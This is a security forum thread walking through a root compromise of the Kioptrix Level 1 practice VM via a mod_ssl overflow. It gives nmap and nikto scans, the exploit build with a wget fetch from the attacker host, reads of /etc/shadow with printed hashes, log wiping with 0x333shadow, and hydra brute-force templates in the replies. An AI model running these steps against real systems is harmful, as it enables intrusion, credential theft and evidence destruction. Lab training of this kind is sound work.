Results 1 to 3 of 3

Thread: [Video] Kioptrix - Level 1 (mod_ssl)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default [Video] Kioptrix - Level 1 (mod_ssl)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4845917/
    Download video: http://www.mediafire.com/?r3327dt3re397hb


    Brief Overview
    Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any mean possible. This video demonstrates a well-known out-of-date issue in "mod_ssl". Because it wasn't too complex, I extended the video by removing the attacker from some log files.


    Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Scan target for running web services (nikto)
    * Discover and run exploit (Open****V2)
    * Gain root (Open****V2)
    * Game Over
    * Modify logs (0x333shadow)


    What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * nikto - (Can be found on BackTrack 4-R2)
    * Internet Browser – (Firefox can be found on BackTrack 4-R2)
    * A Text Editor – (Kate can be found on BackTrack 4-R2)
    * Open****v2.c – (Can be found on exploit-db.com)
    * ptrace/kmod local root exploit – (Can be found on securityfocus.com)
    * 0x333shadow.tar – (Can be found on packetstormsecurity.org)


    Walkthrough
    A quick general nmap scan shows what host are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running, try to identify the operating system (OS) and versions. The result of this is:
    * OS: Linux v2.4.x (2.4.9-18)
    * Web Server: Apache httpd 1.3.20 ((Unix) (Red-hat/Linux)) mod_ssl 2.8.4/OpenSSL 0.9.6b

    The next stage was to use nikto to allow the attacker to detect what vulnerability(s) were being run on the web server. Nikto identities that the version of mod_ssl is "vulnerable to a remote buffer overflow which may allow a remote shell" [CVE-2002-0082, OSVDB-756].

    The attacker then searches an exploit database (exploit-db.com), which return a couple of exploits. The chosen exploit was labelled as "Open****V2.c".

    The exploit needed to be modified to compile on the attackers computer due to updated library files for OpenSSL, as well as updating the link for the privilege escalation exploit.

    After the exploit has been compiled, the attacker looks up the details on the targets environment (from the nmap and nikto scans before) and runs the exploit. After which, not only has the attacker successfully gained a remote shell, the attacker also has "root" access on the targets system.

    As the exploit targets “mod_ssl”, it inherits the same privilege as the user which is running the service (in this case “apache”). If the current privilege isn't enough for the attacker to reach their goal then they must use privilege elevation attacks to gain further access to the system. In most cases, the targeted account would be the highest user, “root”. This would allow the attacker to control anything on the target's system.

    Once the attacker has a remote shell, the next few commands check the objective (which is displayed on the login screen locally) and the local environment as well as the password file.

    The attacker has been using their machine directly, as well as hosting all the necessary files on their machine, therefore, to attempt to cover their traces they remove their IP address from various locations. This is done by using a program called "0x333shadow".

    The attacker runs 0x333shadow which removes traces of the attackers IP in all default log directories, binary files (utmp, wtmp, utmpx, wtmpx, lastlog) as well as scanning “syslog” and “newsyslog” to try and detect other log locations. The attacker commands 0x333shadow to remove the logs after 5 seconds of running the 0x333shadow, allowing them to remove all traces of the program itself.

    Commands
    Code:
    nmap 192.168.0.0/24 -n -sP -sn 
    nmap 192.168.0.111 -O -sS -sV -v 
    clear 
    
    cd /pentest/scanners/nikto 
    ./nikto.pl -host 192.168.0.111 -Display 124 
    
    Firefox: Search (exploit.db): OpenSSL -> Download 
    #http://www.exploit-db.com/exploits/764/">http://www.exploit-db.com/exploits/764/ 
    
    cd ~ 
    gcc 764.c -o exploit -lcrypto 
    kate 764.c 
    -> Add: #include <openssl rc4.h> 
    -> Add: #include <openssl md5.h> 
    Firefox: Search (Google): ptrace-kmod.c. Download: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c 
    cp ptrace-kmod.c /var/www/ 
    start-apache 
    -> Replace: wget 192.168.0.33/ptrace-kmod.c 
    -> Save 
    gcc 764.c -o exploit -lcrypto 
    ls 
    ./exploit 
    ./exploit 0x6b 192.168.0.111 443 
    
    uname -a 
    #cat /etc/*-release 
    whoami 
    cat /etc/issue 
    mail 
    1 
    exit 
    
    cat /etc/shadow 
    
    cd /var/log && grep -r 192.168.0.33 ./ 
    * Firefox: Google -> Search: 0x333shadow.tar.gz. Download: http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/0x333shadow.tar.gz 
    * tar xvf 0x333shadow.tar.gz 
    * cd 0x333shadow 
    * ls 
    * cp 0x333shadow.c /var/www/rmLogs.c
    cd /tmp
    wget 192.168.0.33/rmLogs.c 
    gcc 0x333shadow.c -o rmLogs -D Linux 
    ls 
    ./rmLogs 
    ./rmLogs -a -i 192.168.0.33 -l 5 && rm -rf * 
    locate .bash_history 
    cat /home/john/.bash_history 
    cat /root/.bash_history 
    
    uname -a && whoami 
    
    #--------------------------------------------------------------------- 
    root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7::: 
    john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7::: 
    harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7::: 
    #---------------------------------------------------------------------


    Notes

    * This is a well-known old vulnerability, and has a few different variations on the exploit.
    * Open****V2.c (which uses &quot;ptrace-kmod.c&quot might not gain &quot;root&quot; if the target doesn't have gcc installed or not using a vulnerable kernel version.
    * The attacker may be logged by another service, which 0x333shadow might not remove.
    * Just because the logs have been deleted, doesn't mean you have covered all traces. For example, forensics tools can recover deleted files.
    * As the target only communicates with attacker, instead of using a 3rd party, it helps simplify with removing logs.

    Song: Rocco – Everyone 9.0 (Single Mix) & Kompulsor – Around the World (La La La La) (Single Edit)
    Video length: 06:22
    Capture length: 19:31
    Blog Post: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-1-modssl.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38314-%5Bvideo%5D-kioptrix-level-1-mod_ssl.html#post190751


    ~g0tmi1k
    Last edited by g0tmi1k; 03-23-2011 at 10:12 PM.
    Have you...g0tmi1k?

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Default Re: [Video] Kioptrix - Level 1 (mod_ssl)

    Thanks G0tMi1k for the video,

    I have been trying it however, I got first stuck on compiling the Open****V2.c; and your video helped me in solving it. However, when I ran the exploit against the target, it is not always returning the suid shell; which is weird. I tried running the exploit 6 times, and only got the shell once.

    Have you faced such thing? I am using BT4R2...

    Thanks again

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Kioptrix - Level 1 (mod_ssl)

    Quote Originally Posted by inrikey View Post
    nice post thx
    Quote Originally Posted by SaD Hack3r View Post
    thanks i will try
    Quote Originally Posted by wahran3100 View Post
    thank you for the post .. nice
    Quote Originally Posted by Crypto7 View Post
    thnks man great job ^^
    Thanks for the thanks Glad to hear some feedback!



    Quote Originally Posted by kataibrengsek View Post
    i wonder to know how this script run?
    i cannot find where should i put the IP or Hostname, pls tell me how to do it.

    tks
    There isn't a script? Im not sure what you mean. This is a general break down of it
    Code:
    hydra -l [username] -P [/path/to/wordlists.file] -e ns -t 15 -f -s -vV [hostname/ip] http-get [path]


    Quote Originally Posted by juampix View Post
    Where can download the dicctionary because the link no work http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Please
    thanks for helper
    Just tested that link, its working for me!
    You can find some others by searching the forum too.


    Quote Originally Posted by beastlybribo View Post
    To log onto my router all you need is the password. When i type in

    hydra -p /root/wpa/darkc0de.lst -e ns -t 15 -f -s -vV 192.168.2.1 http-get /

    I get:

    Error: I need at least the -l -L or -C option to know the login

    But my router doesent have a login only a password!!

    Please help
    Have you tried setting the username as "anythingyoulike"?
    As its your router, do a test. Create a small wordlist with the password in the middle somewhere, and see if "-l anythingyoulike" works?
    Have you...g0tmi1k?

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] Kioptrix - Level 2 (Injection)
    By g0tmi1k in forum BackTrack Videos
    Replies: 1
    Last Post: 03-05-2011, 11:47 AM
  3. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  4. [Video] Complete Network - De-ICE.net v2.0 (1.110) {Level 2-Disk 1}
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 2
    Last Post: 03-08-2010, 09:42 AM
  5. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •